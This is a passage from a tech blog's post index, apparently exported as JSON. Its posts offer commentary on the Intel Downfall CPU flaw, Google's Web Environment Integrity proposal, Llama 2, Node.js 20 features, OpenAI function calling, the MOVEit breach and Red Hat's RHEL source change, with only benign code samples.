using confidential computing. Downfall\u0026rsquo;s ability to extract data from SGX enclaves undermines one of the core promises of Intel\u0026rsquo;s trusted execution environment. If your security model depends on SGX protecting secrets from a compromised host OS, you need to ensure the microcode update is applied.\nThe Bigger Pattern # Downfall is the latest in a long line of speculative execution vulnerabilities: Spectre, Meltdown, Foreshadow, MDS, RIDL, ZombieLoad, and now this. Each one exploits a different aspect of speculative execution, but they all stem from the same fundamental tension: modern CPUs optimize for performance by speculatively executing instructions, and those speculative operations can leave observable traces that leak information. This pattern of supply chain and infrastructure vulnerabilities echoes broader security challenges where foundational components become critical risk points.\nThe uncomfortable truth is that this class of vulnerability is architectural. As long as CPUs speculatively access data, there will be opportunities for side-channel attacks. Intel, AMD, and ARM have all been affected by various members of this family, though Intel\u0026rsquo;s aggressive speculation has made it the most frequent target.\nMy Take # Five years after Spectre and Meltdown, I\u0026rsquo;d hoped we were past the \u0026ldquo;new speculative execution CVE every quarter\u0026rdquo; phase. Downfall shows we\u0026rsquo;re not. The affected hardware generation (Skylake through Tiger Lake) represents the bulk of Intel\u0026rsquo;s installed base, and these processors will be in production for years to come.\nFor those of us managing infrastructure, the lesson is familiar but worth repeating: treat CPU vulnerabilities as part of your ongoing security maintenance, not as one-time emergencies. Have a process for evaluating microcode updates, benchmark your actual workloads against mitigations, and keep your threat models current. The importance of systematic supply chain security extends to the foundational hardware components we depend on.\nThe silver lining, if there is one, is that newer Intel architectures appear to be better designed against this class of attack. The forced march toward hardware refresh just got another justification — though try explaining that to the budget committee.\n","date":"3 August 2023","externalUrl":null,"permalink":"/posts/230803-intel-downfall-cpu-vulnerability/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"A new Intel CPU vulnerability called Downfall exposes sensitive data through speculative execution, and the performance impact of mitigations is significant.","title":"Intel's Downfall Vulnerability — Another Speculative Execution Headache","type":"posts"},{"content":"A Google engineer\u0026rsquo;s proposal for a \u0026ldquo;Web Environment Integrity\u0026rdquo; API has exploded across developer communities this week, and the reaction has been overwhelmingly negative. The proposal, which aims to let websites verify that the client environment hasn\u0026rsquo;t been tampered with, sounds reasonable on the surface. Dig into the implications, though, and you start to see why developers are calling this \u0026ldquo;DRM for the web browser.\u0026rdquo;\nHaving watched the browser wars play out over decades, I can tell you this has a familiar smell. Let me break down what\u0026rsquo;s actually being proposed and why it matters.\nWhat the Proposal Actually Says # The Web Environment Integrity API would allow a website to request an \u0026ldquo;environment integrity attestation\u0026rdquo; from the browser. Think of it like a signed certificate that says: \u0026ldquo;This request is coming from an unmodified version of Chrome running on a genuine operating system.\u0026rdquo; The attestation would be provided by a third-party \u0026ldquo;attester\u0026rdquo; — which in practice would likely be Google, Apple, or Microsoft.\nThe stated goals are legitimate: combating ad fraud, preventing bot activity, ensuring game fairness, and protecting content creators. These are real problems. Anyone who\u0026rsquo;s dealt with sophisticated scraping operations or click fraud knows the challenge.\nThe technical mechanism borrows heavily from mobile app attestation — Android\u0026rsquo;s SafetyNet (now Play Integrity) and Apple\u0026rsquo;s App Attest already do similar things for native apps. The proposal essentially extends this model to the web.\nWhy Developers Are Alarmed # The fundamental problem is that this mechanism allows websites to discriminate based on the client software. If a site requires a passing attestation, it can effectively block:\nAlternative browsers: Firefox, Brave, or any browser that doesn\u0026rsquo;t implement attestation or isn\u0026rsquo;t approved by the attester Modified browsers: Any browser with extensions or modifications that the attester considers \u0026ldquo;tampering\u0026rdquo; Ad blockers: Extensions that modify page content could potentially trigger attestation failure Accessibility tools: Screen readers and other assistive technology that injects into pages Linux users: If attestation requires hardware-backed security modules, Linux desktop users could be excluded This isn\u0026rsquo;t hypothetical fear-mongering. We\u0026rsquo;ve already seen this pattern with Android\u0026rsquo;s SafetyNet, where banking apps refuse to run on rooted devices or custom ROMs, even when those modifications have nothing to do with security. The attestation model inherently favors locked-down, vendor-controlled environments.\nThe Monopoly Concern # Here\u0026rsquo;s what makes this particularly concerning: Google controls Chrome (65%+ market share), Chromium (the engine behind Edge, Brave, Opera, and others), and the dominant mobile operating system. If Web Environment Integrity becomes a de facto standard that major sites require, Google effectively becomes the gatekeeper of the web.\nThe proposal acknowledges that attestation should be \u0026ldquo;freely available\u0026rdquo; and that there should be multiple attesters. But the economics and technical requirements of running an attestation service at scale naturally favor incumbents. It\u0026rsquo;s hard to imagine a truly independent attestation ecosystem when the browser vendor, the OS vendor, and the attester are all the same company.\nWe\u0026rsquo;ve seen this centralization play out before with proprietary standards and approaches to open ecosystems. When major platforms change their governance or restrictions, the impact on the broader ecosystem can be severe, highlighting why open standards and multi-vendor support are critical.\nThe Technical Architecture Problem # Even setting aside the political concerns, the technical design raises questions. Attestation introduces a new point of failure and latency in every web request that requires it. The attester becomes critical infrastructure — if it goes down, attested sites become inaccessible. And the privacy implications of a central service that knows which sites you\u0026rsquo;re visiting (because it\u0026rsquo;s providing attestations for those requests) are significant, despite the proposal\u0026rsquo;s claims about privacy preservation.\nFrom an engineering perspective, I\u0026rsquo;m also skeptical about the attestation\u0026rsquo;s durability. The history of DRM and client-side attestation is a history of bypasses. Sophisticated attackers will find ways to fake attestations, while legitimate users with unusual setups get blocked. This is the same dynamic we see with every client-side trust mechanism.\nThe W3C Factor # The proposal was originally floated through the WICG (Web Incubator Community Group), which is a precursor to formal W3C standardization. It\u0026rsquo;s worth noting that other browser vendors — Mozilla and Apple in particular — have not expressed support. Mozilla has historically opposed similar proposals, and their position on this one seems likely to follow suit.\nThe web standards process exists specifically to prevent a single vendor from unilaterally changing the web platform. If this proposal doesn\u0026rsquo;t get multi-vendor support, it could still be implemented as a Chrome-only feature — but that would make the monopoly concerns even more acute. The principle of open governance and community stewardship matters as much in web standards as it does in broader open source projects.\nMy Take # I\u0026rsquo;ve spent enough years building for the web to have strong opinions about what makes it valuable. The web\u0026rsquo;s power has always been its openness — any client can access any server, the source is viewable, and no single entity controls the platform. Web Environment Integrity doesn\u0026rsquo;t just chip away at that openness; it fundamentally inverts the trust model.\nInstead of servers earning trust by proving their identity (via TLS certificates), clients would now need to prove their \u0026ldquo;integrity\u0026rdquo; to servers. That\u0026rsquo;s a profound shift, and it\u0026rsquo;s one that benefits platform owners at the expense of users and independent developers.\nThe stated problems — bots, fraud, cheating — are real. But the solution shouldn\u0026rsquo;t be to hand control of the web\u0026rsquo;s client environment to a handful of attestation providers. We should be solving these problems at the application layer, with techniques like behavioral analysis, rate limiting, and server-side validation.\nI\u0026rsquo;m watching the community response to this with cautious optimism. The backlash has been swift and technically articulate. Whether it\u0026rsquo;s enough to stop a determined Google from pushing forward remains to be seen.\n","date":"27 July 2023","externalUrl":null,"permalink":"/posts/230727-google-web-environment-integrity/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Google’s Web Environment Integrity API proposal has the web development community up in arms, and the concerns are well-founded.","title":"Google's Web Environment Integrity Proposal — DRM for the Web?","type":"posts"},{"content":"Yesterday Meta dropped what might be the most significant open-source AI release of the year: Llama 2, a family of large language models available for both research and commercial use. After the original Llama leaked earlier this year and spread across the open-source community like wildfire, Meta has now decided to lean into the openness rather than fight it. It\u0026rsquo;s a bold move, and one that could reshape how we think about AI development for years to come.\nWhat Llama 2 Actually Brings to the Table # The release includes pretrained and fine-tuned models at three scales: 7B, 13B, and 70B parameters. The fine-tuned variants, dubbed Llama 2-Chat, have been optimized for dialogue use cases using reinforcement learning from human feedback (RLHF) — the same technique that powers ChatGPT\u0026rsquo;s conversational abilities.\nWhat makes this technically interesting isn\u0026rsquo;t just the model sizes. Meta published a detailed research paper walking through their training methodology, including their approach to safety tuning. The 70B parameter chat model reportedly performs competitively with ChatGPT on many benchmarks, though the exact comparisons vary depending on the task.\nThe training data cutoff and context window (4096 tokens) are limitations worth noting. You\u0026rsquo;re not getting GPT-4 capability here. But you are getting a model you can download, run locally, fine-tune on your own data, and deploy without per-token API costs. For many production use cases, that trade-off is more than acceptable.\nThe Licensing Sweet Spot # Meta partnered with Microsoft on this release, making the models available through Azure and directly via download. The license is interesting — it\u0026rsquo;s not a traditional open-source license like Apache 2.0. Instead, it\u0026rsquo;s a custom community license that allows commercial use, but with a notable restriction: if your product or service has more than 700 million monthly active users, you need a special license from Meta.\nThat threshold effectively means any startup, mid-size company, or even most enterprises can use Llama 2 freely. It only gates the handful of companies that could genuinely compete with Meta at scale. It\u0026rsquo;s clever positioning — open enough to build an ecosystem, restricted enough to prevent direct competitors from free-riding.\nFrom a practical standpoint, for the developers I work with building internal tools, customer-facing applications, and data pipelines, this license is perfectly fine. We can fine-tune on domain-specific data, deploy on our own infrastructure, and maintain complete control over the model behavior. That\u0026rsquo;s been the missing piece for many AI integration projects.\nRunning It Yourself # The community has already started optimizing Llama 2 for consumer hardware. Projects like llama.cpp have been updated to support the new models, enabling quantized versions to run on machines with modest GPU (or even CPU-only) setups.\nI\u0026rsquo;ve been testing the 13B chat variant on a workstation with an RTX 3090, and the results are genuinely impressive for local inference. Response quality for code generation and technical Q\u0026amp;A is solid — not GPT-4 level, but easily good enough for many practical tasks. The 7B model can even run comfortably on a MacBook Pro with Apple Silicon using the GGML format.\nFor teams evaluating whether to build on OpenAI\u0026rsquo;s API versus running their own inference, this changes the math considerably. Later developments like Meta\u0026rsquo;s Llama 3.1 release would further validate this approach. The upfront investment in infrastructure and fine-tuning expertise is real, but the operational costs and data privacy benefits can be substantial. I\u0026rsquo;ve seen too many projects hit walls when they realize their entire AI pipeline depends on a third-party API with rate limits, changing pricing, and no guarantee of model consistency.\nWhat This Means for the AI Ecosystem # Meta\u0026rsquo;s strategy here seems clear: commoditize the complement. By making strong foundation models freely available, they increase the value of their own infrastructure, data, and research capabilities while making it harder for competitors to charge premium prices for API access alone.\nFor the broader ecosystem, this is unambiguously positive. More accessible models mean more experimentation, more fine-tuned variants for specific domains, and faster iteration on techniques like retrieval-augmented generation with modern LLMs and tool use. The research community gets reproducible baselines. Small companies get capable models they can actually afford to deploy.\nMy Take # I\u0026rsquo;ve been building software for three decades, and I\u0026rsquo;ve seen plenty of \u0026ldquo;everything changes\u0026rdquo; moments that turned out to be incremental. But the trajectory of open AI models this year — from the Llama leak in March, through the explosion of fine-tuned variants, to this official commercial release — feels genuinely different.\nThe gap between proprietary and open models is closing faster than most people expected. Six months ago, running a competent LLM locally was a novelty. Now it\u0026rsquo;s becoming a legitimate architectural choice for production systems. The ecosystem continued to mature with new models emerging regularly. Meta releasing Llama 2 with commercial terms doesn\u0026rsquo;t just validate the open approach — it accelerates it.\nIf you\u0026rsquo;re a developer or engineering leader evaluating AI integration, now is the time to start experimenting with self-hosted models. The tooling is maturing rapidly, and having the option to move between API-based and self-hosted inference gives you strategic flexibility that will only become more valuable as this space evolves.\nThe AI landscape just got a lot more interesting for those of us who prefer to own our infrastructure.\n","date":"20 July 2023","externalUrl":null,"permalink":"/posts/230720-meta-llama2-open-source-llm/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Meta’s release of Llama 2 as a commercially-licensed open model changes the game for developers building with large language models.","title":"Meta Releases Llama 2 — Open Source AI Gets a Massive Boost","type":"posts"},{"content":"Node.js 20 entered LTS preparation in April, and after a few months of running it in development environments, I\u0026rsquo;m increasingly convinced this is one of the most significant Node releases in years. Not because of any single headline feature, but because two additions — the stable test runner and the experimental permission model — signal a fundamental shift in how the Node.js project thinks about the runtime\u0026rsquo;s role.\nFor a platform that famously relied on the ecosystem for almost everything, Node.js building these capabilities into the core is a statement. And having used both extensively, I think they got it right.\nThe Built-in Test Runner Grows Up # Node\u0026rsquo;s test runner module (node:test) was introduced as experimental in Node 18. In Node 20, it\u0026rsquo;s been promoted to stable, and the improvements since its initial release are substantial.\nIf you\u0026rsquo;ve been writing Node.js for any length of time, you\u0026rsquo;ve had the \u0026ldquo;which test framework\u0026rdquo; conversation. Jest, Mocha, Vitest, AVA, tap — the ecosystem is rich but fragmented. Every project makes a different choice, every team has preferences, and switching between projects means context-switching between test APIs.\nThe built-in test runner doesn\u0026rsquo;t try to replace these frameworks entirely, but it provides a solid foundation that requires zero dependencies:\nimport { describe, it } from \u0026#39;node:test\u0026#39;; import assert from \u0026#39;node:assert\u0026#39;; describe(\u0026#39;user service\u0026#39;, () =\u0026gt; { it(\u0026#39;should create a user with valid input\u0026#39;, async () =\u0026gt; { const user = await createUser({ name: \u0026#39;Test\u0026#39;, email: \u0026#39;test@example.com\u0026#39; }); assert.strictEqual(user.name, \u0026#39;Test\u0026#39;); assert.ok(user.id); }); it(\u0026#39;should reject invalid email\u0026#39;, async () =\u0026gt; { await assert.rejects( () =\u0026gt; createUser({ name: \u0026#39;Test\u0026#39;, email: \u0026#39;invalid\u0026#39; }), { code: \u0026#39;VALIDATION_ERROR\u0026#39; } ); }); }); The API will feel familiar to anyone who\u0026rsquo;s used Mocha or Node\u0026rsquo;s tap. But the details matter:\nSubtests and nesting work naturally with describe and it blocks. Concurrent test execution is supported out of the box — tests within a describe block can run in parallel with the { concurrency: true } option. Test hooks (before, after, beforeEach, afterEach) work as expected. Mocking is built in via node:test\u0026rsquo;s mock object, covering timers, functions, and modules.\nThe mock capabilities are particularly welcome. Previously, mocking in Node tests meant pulling in sinon, proxyquire, jest.mock(), or similar. Having it built into the runtime means fewer dependencies and fewer compatibility issues.\nI\u0026rsquo;ve been migrating a medium-sized internal API project from Jest to node:test over the past month. The test suite — about 300 tests — moved over with surprisingly little friction. The main gaps I\u0026rsquo;ve hit are snapshot testing (not yet supported) and the rich matcher library Jest provides. For the matchers, node:assert is more verbose but perfectly functional. For snapshots, I\u0026rsquo;m holding off on those test files for now.\nThe Permission Model: Defense in Depth for Node # The more quietly revolutionary feature in Node 20 is the experimental permission model. Enabled with the --experimental-permission flag, it lets you restrict what a Node.js process can do:\nnode --experimental-permission --allow-fs-read=/app/config --allow-fs-write=/app/logs app.js This restricts the process to reading only from /app/config and writing only to /app/logs. Any attempt to access other paths, spawn child processes, or use worker threads throws an ERR_ACCESS_DENIED error.\nThe available permission flags include:\n--allow-fs-read and --allow-fs-write for filesystem access --allow-child-process for spawning processes --allow-worker for worker threads If you\u0026rsquo;re thinking \u0026ldquo;this sounds like Deno\u0026rsquo;s permission model,\u0026rdquo; you\u0026rsquo;re right. Deno pioneered this approach with its secure-by-default philosophy, requiring explicit permissions for file access, network access, and environment variables. Node is following suit, though the implementation differs.\nWhy does this matter? Because the Node.js ecosystem\u0026rsquo;s biggest security liability has always been its dependency chain. A typical Node project pulls in hundreds or thousands of transitive dependencies. Any one of them could contain malicious code that reads your filesystem, exfiltrates environment variables, or spawns processes.\nThe permission model doesn\u0026rsquo;t eliminate this risk — a compromised dependency within the allowed paths can still cause damage — but it significantly reduces the blast radius. If your application only needs to read from its config directory and write to its log directory, the permission model ensures that a rogue postinstall script or compromised dependency can\u0026rsquo;t read your SSH keys or write to arbitrary system paths.\nPractical Implications for Production # For production deployments, combining the permission model with container security creates a robust defense-in-depth strategy:\nContainer-level restrictions (read-only filesystem, dropped capabilities, non-root user) Node permission model (restrict file access to specific paths, disable child process spawning) Application-level validation (input sanitization, output encoding) Each layer catches different classes of attacks. The Node permission model is particularly valuable for catching supply chain attacks that container security alone would miss — a dependency reading process.env to exfiltrate secrets, for example, could be blocked if you restrict which environment variables are accessible (though that granularity isn\u0026rsquo;t in the current implementation yet).\nI\u0026rsquo;ve been running a staging environment with permissions enabled for the past six weeks. The initial setup required mapping out exactly which filesystem paths the application needs — which, honestly, is an exercise every team should do regardless. We discovered three dependencies that were writing temp files to unexpected locations and one that was reading /etc/hosts for no apparent reason. The permission model forced a security audit we should have done ages ago.\nThe Broader Trend # Node 20 reflects a maturing ecosystem. The built-in test runner reduces dependency on external tooling for a fundamental development activity. The permission model acknowledges that security can\u0026rsquo;t be an afterthought in a runtime that powers millions of production applications.\nBoth features also show Node.js learning from its competition. Deno\u0026rsquo;s security model and built-in tooling clearly influenced these additions. Bun\u0026rsquo;s focus on developer experience and performance is pushing Node to improve its own story. Competition in the JavaScript runtime space is producing better outcomes for everyone.\nMy Take # I\u0026rsquo;ve been writing Node.js since the 0.x days, and the trajectory of the project has been remarkable. From a scrappy runtime that relied entirely on npm for everything to a platform that includes testing, permissions, HTTP/2, worker threads, and diagnostic tools — Node has grown into a genuinely mature server-side runtime.\nThe test runner won\u0026rsquo;t replace Jest or Vitest for every project — those tools have richer ecosystems and more features. But for new projects, libraries, and smaller services, starting with node:test means one fewer dependency to manage, one fewer configuration to maintain, and one fewer tool to keep updated.\nThe permission model is the feature I\u0026rsquo;m most excited about long-term. It\u0026rsquo;s experimental today, but if the Node project continues to expand its scope — adding network permission controls, environment variable restrictions, and finer-grained filesystem policies — it could fundamentally improve the security story for Node.js applications.\nNode 20 deserves more attention than it\u0026rsquo;s getting. Sometimes the most important features aren\u0026rsquo;t the flashiest.\nThis post is part of my Developer Landscape series, tracking the tools and platforms that shape modern software development.\n","date":"13 July 2023","externalUrl":null,"permalink":"/posts/230713-nodejs-20-test-runner-permission-model/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Node.js 20 brings a stable built-in test runner and an experimental permission model — two features that signal a maturing runtime taking security and developer experience seriously.","title":"Node.js 20: The Built-in Test Runner and Permission Model Change the Game","type":"posts"},{"content":"If you\u0026rsquo;ve been building applications with the OpenAI API, you\u0026rsquo;ve probably hit the same wall I have: getting structured, reliable output from a language model is surprisingly hard. You send a prompt asking for JSON, and sometimes you get JSON, sometimes you get JSON wrapped in markdown code blocks, and sometimes you get a friendly paragraph explaining what the JSON would look like. This is a fundamental challenge in production LLM systems, where reliability matters as much as capability. It\u0026rsquo;s the kind of inconsistency that makes production systems fragile.\nOpenAI\u0026rsquo;s function calling feature, released a few weeks ago alongside the new GPT-3.5-turbo and GPT-4 model updates, changes this dynamic fundamentally. It\u0026rsquo;s not just a quality-of-life improvement — it\u0026rsquo;s a paradigm shift in how we build LLM-powered applications.\nHow Function Calling Works # The concept is elegantly simple. When you make an API call, you can define a set of functions with their parameters described as JSON Schema. The model then decides whether to call a function based on the conversation context, and if so, returns a structured JSON object with the function name and arguments — not the function\u0026rsquo;s result, but the call itself.\n{ \u0026#34;functions\u0026#34;: [ { \u0026#34;name\u0026#34;: \u0026#34;get_weather\u0026#34;, \u0026#34;description\u0026#34;: \u0026#34;Get the current weather for a location\u0026#34;, \u0026#34;parameters\u0026#34;: { \u0026#34;type\u0026#34;: \u0026#34;object\u0026#34;, \u0026#34;properties\u0026#34;: { \u0026#34;location\u0026#34;: { \u0026#34;type\u0026#34;: \u0026#34;string\u0026#34;, \u0026#34;description\u0026#34;: \u0026#34;City and country\u0026#34; }, \u0026#34;unit\u0026#34;: { \u0026#34;type\u0026#34;: \u0026#34;string\u0026#34;, \u0026#34;enum\u0026#34;: [\u0026#34;celsius\u0026#34;, \u0026#34;fahrenheit\u0026#34;] } }, \u0026#34;required\u0026#34;: [\u0026#34;location\u0026#34;] } } ] } The model doesn\u0026rsquo;t execute the function. It tells you what to call and with what arguments. Your application code handles the actual execution, passes the result back to the model, and the model incorporates it into its response. The model becomes an orchestration layer — understanding user intent and mapping it to your application\u0026rsquo;s capabilities.\nWhy This Matters More Than It Seems # Before function calling, building reliable LLM-powered tools required elaborate prompt engineering. You\u0026rsquo;d craft system messages that said things like \u0026ldquo;Always respond with valid JSON in the following format\u0026hellip;\u0026rdquo; and then build error handling for the inevitable cases where the model didn\u0026rsquo;t comply. Libraries like LangChain built entire abstraction layers to manage this unreliability.\nFunction calling solves this at the model level. The model has been fine-tuned to understand function definitions and produce valid calls. In my testing over the past few weeks, the reliability improvement is dramatic. Where I used to see 10-15% malformed outputs with prompt-based approaches, function calling produces correctly structured output essentially 100% of the time.\nBut the real power isn\u0026rsquo;t just structured output — it\u0026rsquo;s the ability to build genuine agent-like systems. Consider a customer support bot that can:\nLook up an order status (function: get_order_status) Initiate a return (function: create_return) Check product availability (function: check_inventory) Escalate to a human agent (function: escalate_ticket) The model decides which function to call based on the user\u0026rsquo;s message. No complex routing logic in your code. No intent classification model. The LLM handles the understanding; your code handles the execution.\nBuilding a Real Integration # I\u0026rsquo;ve spent the past couple of weeks rebuilding a side project — a natural language interface for infrastructure monitoring — using function calling. The difference in code complexity is remarkable.\nPreviously, the application had a multi-stage pipeline: parse user intent from the model\u0026rsquo;s text output, validate the parsed result, map it to internal functions, handle errors when parsing failed. It was about 400 lines of glue code that was fragile and hard to test.\nWith function calling, the pipeline collapsed to about 80 lines. Define the functions, send the message, receive the function call, execute it, return the result. The code reads like a straightforward API integration rather than an exercise in parsing unpredictable text.\nA few patterns I\u0026rsquo;ve found work well:\nKeep functions granular. Rather than one massive do_everything function, define small, focused functions. The model is better at selecting the right tool from a targeted set than navigating a complex parameter space.\nUse descriptions liberally. The function and parameter descriptions aren\u0026rsquo;t just documentation — they\u0026rsquo;re part of the model\u0026rsquo;s context for deciding when and how to use each function. Good descriptions dramatically improve accuracy.\nHandle the conversation loop. Function calling often requires multiple turns: the model calls a function, you return the result, the model processes it and potentially calls another function. Build your application to handle this loop naturally.\nValidate inputs anyway. The model produces well-structured JSON, but you should still validate the actual values. A correctly formatted but nonsensical parameter value is still a bug.\nThe Competitive Landscape Shifts # Function calling isn\u0026rsquo;t just a feature — it\u0026rsquo;s OpenAI staking out the \u0026ldquo;AI as orchestration layer\u0026rdquo; position. By making it trivially easy to connect GPT to external tools and data sources, they\u0026rsquo;re positioning themselves as the brain that coordinates your entire application stack.\nThis puts pressure on every other LLM provider. Anthropic\u0026rsquo;s Claude, Google\u0026rsquo;s PaLM, open-source models like Llama — they\u0026rsquo;ll all need equivalent capabilities to compete for developer adoption. The models that can reliably interface with external tools will win the application layer.\nFor developers, this is broadly positive. Competition drives improvement, and the pattern OpenAI has established — model as function router — is clean enough that it can be implemented across different providers. I expect we\u0026rsquo;ll see open-source frameworks standardizing this pattern within months.\nMy Take # I\u0026rsquo;ve been building software long enough to recognize genuine capability shifts versus marketing hype. Function calling is the former. It takes LLMs from \u0026ldquo;impressive demo\u0026rdquo; to \u0026ldquo;production-ready component\u0026rdquo; for a whole class of applications.\nThe pattern of model-as-orchestrator, with your code handling the actual capabilities, is the right architecture. It keeps the model doing what it\u0026rsquo;s good at (understanding intent, handling ambiguity) while your deterministic code handles what it\u0026rsquo;s good at (reliable execution, data access, business logic).\nIf you\u0026rsquo;re building LLM-powered applications — or considering it — function calling should be the foundation of your architecture. The era of parsing free-text model output with regex and prayers is mercifully ending.\nWe\u0026rsquo;re still in the early days of figuring out the right patterns for LLM-powered applications. But function calling feels like the kind of primitive that everything else gets built on top of. It\u0026rsquo;s the XMLHttpRequest moment for AI-powered development — not exciting on its own, but transformative in what it enables.\nThis is part of my AI in Development series, exploring how AI tools and techniques are becoming part of the everyday developer toolkit.\n","date":"6 July 2023","externalUrl":null,"permalink":"/posts/230706-openai-function-calling-developer-workflows/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"OpenAI’s function calling capability transforms GPT models from text generators into programmable agents — here’s what it means for developers building real applications.","title":"OpenAI's Function Calling Changes Everything About Building with LLMs","type":"posts"},{"content":"The scale of the MOVEit Transfer breach keeps expanding. What started as a single zero-day vulnerability disclosure at the end of May has now ballooned into one of the largest mass-exploitation events of the year. Hundreds of organizations are confirmed affected, from government agencies to major corporations, with the Cl0p ransomware gang claiming responsibility and methodically leaking data from organizations that refuse to pay.\nEvery week brings new victims. The BBC, British Airways, Shell, the US Department of Energy, multiple US state governments, universities, and financial institutions — the list grows daily. And we\u0026rsquo;re likely still in the early stages of understanding the full blast radius.\nThe Vulnerability Chain # The initial vulnerability, CVE-2023-34362, is a SQL injection flaw in the MOVEit Transfer web application. It\u0026rsquo;s about as classic as vulnerabilities get — an unauthenticated attacker can send crafted requests to the application endpoint and execute arbitrary SQL against the backend database. From there, it\u0026rsquo;s trivial to exfiltrate data or deploy webshells for persistent access.\nProgress Software, the maker of MOVEit, patched the initial flaw on May 31. But the damage was already done. Cl0p had been exploiting the vulnerability since at least late May, quietly exfiltrating data from hundreds of MOVEit instances before anyone knew what was happening.\nThen it got worse. On June 9, a second vulnerability (CVE-2023-35036) was discovered during code review prompted by the first. On June 15, a third (CVE-2023-35708). Each required emergency patches. The pattern suggests that MOVEit\u0026rsquo;s codebase has deep-seated security issues that weren\u0026rsquo;t caught during development. When you find one SQL injection bug, there are usually more.\nWhy Managed File Transfer Is a Perfect Target # If you\u0026rsquo;ve worked in enterprise IT, you know managed file transfer (MFT) tools. They\u0026rsquo;re the workhorses that move sensitive data between organizations — financial records, healthcare data, HR files, legal documents. They\u0026rsquo;re often internet-facing by design, because they need to receive files from external partners.\nThis makes them perfect targets:\nInternet-facing: They have to be accessible, which means they\u0026rsquo;re in the attacker\u0026rsquo;s crosshairs High-value data: The files passing through MFT systems are exactly what attackers want Trusted position: MFT tools often have access to internal networks and databases Slow to patch: Organizations running critical file transfer infrastructure are often reluctant to apply patches quickly for fear of breaking integrations Legacy codebases: Many MFT products have been around for decades, with code written before modern security practices were standard The MOVEit breach follows the same playbook as the Accellion FTA exploitation in late 2020 and early 2021, and the GoAnywhere MFT breach earlier this year. Cl0p has been systematically targeting MFT platforms. They\u0026rsquo;ve found a lucrative niche.\nThe Supply Chain Dimension # What makes MOVEit particularly devastating is the supply chain amplification. Many affected organizations weren\u0026rsquo;t running MOVEit themselves — they were sharing data with a partner or vendor that was. Zellis, a UK-based payroll provider, used MOVEit to process payroll data. When Zellis was breached, the personal data of employees at the BBC, British Airways, Boots, and Aer Lingus was exposed.\nThis is the supply chain risk that security professionals have been warning about for years, manifested in the most straightforward way possible. Your security posture isn\u0026rsquo;t just about your own systems — it\u0026rsquo;s about every third party that touches your data.\nFor DevOps teams and infrastructure engineers, this should prompt some uncomfortable questions:\nDo you know every file transfer mechanism in your organization? Not just the official MFT platform, but the SFTP servers, the shared drives, the \u0026ldquo;temporary\u0026rdquo; solutions that became permanent. What data flows through these systems? Can you map the sensitivity of the data being transferred? How quickly can you patch internet-facing file transfer services? If the answer is \u0026ldquo;weeks,\u0026rdquo; you have a problem. Do your vendor contracts include security requirements for data handling? And do you verify compliance? What We Should Be Doing # The immediate response to MOVEit is patch, investigate, and contain. But the broader lesson is about the security of data-in-transit infrastructure.\nIn my experience, file transfer systems are among the most neglected components in enterprise security programs. They\u0026rsquo;re \u0026ldquo;boring\u0026rdquo; infrastructure — not as exciting as cloud-native services or AI platforms. They don\u0026rsquo;t get the attention or investment that web applications or API gateways receive. But they process some of the most sensitive data in the organization.\nA few practical steps that every team should consider:\nInventory your file transfer systems. All of them. Including the ones running on that server in the corner that nobody wants to touch. Minimize exposure. Not every MFT instance needs to face the internet. VPNs, IP whitelisting, and zero-trust networking can reduce the attack surface. Monitor aggressively. Unusual data volumes, unexpected access patterns, new files appearing in transfer directories — these are signals that something is wrong. Encrypt data at rest, not just in transit. If an attacker compromises the MFT server, encrypted data at rest limits the damage. Review vendor security. If your partners are moving your data through tools like MOVEit, their security is your security. My Take # I\u0026rsquo;ve seen enough breaches over the years to know that the biggest ones rarely involve exotic zero-days in cutting-edge software. They involve mundane vulnerabilities in mundane systems that handle extraordinarily sensitive data. MOVEit is a textbook example.\nThe Cl0p gang isn\u0026rsquo;t doing anything technically sophisticated here. SQL injection in a web application? We\u0026rsquo;ve known how to prevent that for twenty years. The sophistication is in the targeting — identifying that MFT platforms are high-value, widely deployed, and poorly defended.\nThis breach will keep expanding for weeks, possibly months. If your organization uses MOVEit — or any MFT platform — treat this as a wake-up call. And if you\u0026rsquo;re involved in DevOps or infrastructure, make sure file transfer systems get the same security attention as everything else in your stack.\nThis is part of my Security in Practice series, examining real-world security incidents and their implications for developers and infrastructure teams.\n","date":"29 June 2023","externalUrl":null,"permalink":"/posts/230629-moveit-breach-supply-chain-security/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"The MOVEit Transfer vulnerability has now impacted hundreds of organizations worldwide — a stark reminder that managed file transfer tools remain critical and under-secured attack surfaces.","title":"MOVEit Transfer: The Supply Chain Breach That Keeps Growing","type":"posts"},{"content":"Red Hat dropped a bombshell yesterday. They announced that CentOS Stream will be the sole repository for public RHEL-related source code going forward. The complete RHEL source, previously available through their Git infrastructure, will now only be accessible to paying customers and partners through the customer portal.\nLet me be direct: this is a seismic shift for the enterprise Linux ecosystem, and the implications run far deeper than the immediate headlines suggest.\nWhat Actually Changed # To understand why this matters, you need to understand the ecosystem Red Hat built — and that others built around it. For over two decades, RHEL source code has been publicly available. This wasn\u0026rsquo;t charity; it was a legal obligation under the GPL. Red Hat\u0026rsquo;s business model was built on selling support, not software. The code was free; the expertise to run it in production was what you paid for.\nThis public availability spawned an entire ecosystem of downstream distributions. CentOS was the most prominent — a free, community-maintained rebuild of RHEL, bug-for-bug compatible. When Red Hat acquired CentOS in 2014 and then converted it to CentOS Stream (a rolling preview of RHEL rather than a rebuild) in late 2020, alternatives like Rocky Linux and AlmaLinux emerged to fill the gap.\nNow Red Hat is going further. While they claim they\u0026rsquo;re still GPL-compliant — the source is available to customers, who can redistribute it — they\u0026rsquo;ve effectively cut off the downstream rebuilders at the knees. Rocky Linux, AlmaLinux, and Oracle Linux all depended on that public source access to create their RHEL-compatible distributions.\nThe GPL Compliance Question # Red Hat\u0026rsquo;s position is legally defensible but ethically murky. The GPL requires that source code be made available to those who receive the binary. RHEL customers get the source. What Red Hat appears to be doing is using their customer agreements to discourage redistribution — not technically violating the GPL, but certainly violating its spirit.\nTheir blog post accompanying the announcement characterized the downstream rebuilders as companies that add \u0026ldquo;value\u0026rdquo; by stripping out Red Hat trademarks and rebuilding the code. The tone was dismissive, framing these projects as freeloaders rather than ecosystem participants.\nThis framing conveniently ignores that CentOS and its successors served as a massive on-ramp to RHEL. Countless organizations started on CentOS, grew their operations, and eventually became paying RHEL 